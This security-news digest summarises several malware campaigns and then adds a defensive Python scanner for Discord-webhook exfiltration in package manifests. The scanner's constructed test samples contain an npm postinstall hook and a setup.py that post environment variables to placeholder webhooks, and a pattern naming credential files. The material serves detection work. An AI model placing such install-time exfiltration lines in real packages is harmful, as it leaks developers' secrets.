New Stealit Campaign Abuses Node.js Single Executable Application
FortiGuard Labs has identified a new and active Stealit malware campaign that leverages Node.js’ Single Executable Application (SEA) feature to distribute its payloads. The campaign came to light after a spike in detections of a Visual Basic script later confirmed to serve persistence purposes. Unlike earlier Stealit campaigns built with Electron, this version uses Node.js’ SEA to bundle scripts and assets into standalone binaries, so the malware runs without a pre-installed Node.js runtime.
Source: Fortinet
—
GhostBat RAT: Inside the Resurgence of RTO-Themed Android Malware
Cyble Research and Intelligence Labs (CRIL) observed a surge in Android malware campaigns disguised as Indian RTO applications. Distributed via WhatsApp messages, SMS, and compromised websites, these fake apps capture banking credentials and UPI PINs, and exfiltrate SMS messages containing financial keywords. Some variants even include cryptocurrency mining features. Infected devices are registered through a Telegram bot named GhostBatRat_bot, linking the campaign to the GhostBat RAT malware.
Source: Cyble
—
When the Monster Bytes: Tracking TA585 and Its Arsenal
Proofpoint researchers have uncovered a new cybercriminal actor, TA585, operating with high sophistication and distributing malware like MonsterV2, a remote access trojan, stealer, and loader. MonsterV2 is sold on hacking forums and used by a small number of actors. TA585 stands out for managing its own infrastructure, delivery, and malware deployment without relying on third-party services or brokers.
Source: Proofpoint
—
Chinese Hackers Abuse Geo-Mapping Tool for Year-Long Persistence
Chinese state-sponsored hackers remained undetected for over a year by exploiting a component of Esri’s ArcGIS geo-mapping tool, converting it into a web shell. ArcGIS, widely used by municipalities and infrastructure operators, supports server object extensions (SOEs) that add custom server-side functionality. ReliaQuest researchers attribute the attack to a Chinese APT group, likely Flax Typhoon, based on operational similarities.
Source: BleepingComputer
—
npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels
Researchers have discovered malicious packages across npm, Python, and Ruby ecosystems using Discord as a command-and-control channel. Attackers exploit Discord webhooks to transmit stolen data to actor-controlled channels, as webhooks can post messages without authentication and are write-only, preventing defenders from reviewing prior posts. This approach shifts the economics of supply chain attacks by leveraging widely accessible cloud-based tools.
Source: TheHackerNews
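The defensive side of the webhook technique described above is that a Discord webhook URL has a fixed, recognisable shape, so it can be flagged in package manifests and install-time scripts before a package is pulled into a build. The scanner below is an added example written for this digest, not code from the researchers or from any of the package registries; the sample package.json and setup.py bodies are constructed for illustration, and the list of "local data access" indicators is an assumption chosen to show the idea, not an exhaustive signature set.

```python
"""Flag package manifests and install scripts that post to Discord webhooks.

Added example for this digest: demonstrates detection of the write-only,
unauthenticated webhook pattern in npm lifecycle scripts and arbitrary
install-time code (setup.py, gemspec). Samples below are constructed.
"""
import json
import re

# Shape of a Discord webhook endpoint: /api/webhooks/<numeric id>/<token>.
# Subdomains (e.g. canary.discord.com) and the legacy discordapp.com host are covered.
DISCORD_WEBHOOK_RE = re.compile(
    r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+",
    re.IGNORECASE,
)

# npm lifecycle scripts that run automatically on `npm install` without the
# developer invoking them; a webhook here is treated as high severity.
NPM_AUTORUN_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Indicators that the script gathers developer data before posting.
# Assumption: illustrative list, not an exhaustive signature set.
DATA_ACCESS_RE = re.compile(
    r"process\.env|os\.environ|ENV\[|\.npmrc|\.ssh|\.aws|\.gitconfig|Dir\.home|homedir\("
)


def find_webhooks(text):
    """Return the distinct Discord webhook URLs found in a text body."""
    return sorted(set(DISCORD_WEBHOOK_RE.findall(text)))


def scan_text(text):
    """Scan any script or manifest body. Returns a finding dict, or None if clean."""
    urls = find_webhooks(text)
    if not urls:
        return None
    return {
        "webhooks": urls,
        "reads_local_data": bool(DATA_ACCESS_RE.search(text)),
    }


def scan_npm_manifest(manifest_json):
    """Check every npm lifecycle script; severity depends on whether it auto-runs."""
    pkg = json.loads(manifest_json)
    findings = []
    for hook, cmd in pkg.get("scripts", {}).items():
        hit = scan_text(cmd)
        if hit:
            hit["hook"] = hook
            hit["severity"] = "high" if hook in NPM_AUTORUN_HOOKS else "medium"
            findings.append(hit)
    return findings


# Constructed sample: a package.json whose postinstall hook ships process.env
# to a webhook. The id/token values are placeholders, not real endpoints.
SAMPLE_PACKAGE_JSON = r'''{
  "name": "example-widget",
  "version": "1.0.0",
  "scripts": {
    "test": "node test.js",
    "postinstall": "node -e \"require('https').request('https://discord.com/api/webhooks/123456789012345678/AbCdEf-ghIJkl_0123', {method:'POST'}).end(JSON.stringify(process.env))\""
  }
}'''

# Constructed sample: a setup.py that posts the environment during install.
SAMPLE_SETUP_PY = '''
import os, urllib.request
from setuptools import setup
HOOK = "https://discordapp.com/api/webhooks/987654321098765432/zyx-WVU_987"
urllib.request.urlopen(HOOK, data=str(dict(os.environ)).encode())
setup(name="example-pkg", version="0.1")
'''

# Constructed benign control.
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="clean", version="1.0")\n'


if __name__ == "__main__":
    for f in scan_npm_manifest(SAMPLE_PACKAGE_JSON):
        print("npm:", f)
    print("setup.py:", scan_text(SAMPLE_SETUP_PY))
    print("benign:", scan_text(BENIGN_SETUP_PY))
```

In practice this check belongs in a pre-install gate (a registry proxy or CI step that inspects the tarball before `npm install`, `pip install` or `gem install` runs hooks), because once the lifecycle script has executed, the write-only webhook has already received the data and there is nothing on the Discord side for a defender to read back.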
AresISEC d.o.o. · Zagreb, Croatia · OIB: 49411602130 · info@aresisec.hr
© 2026 AresISEC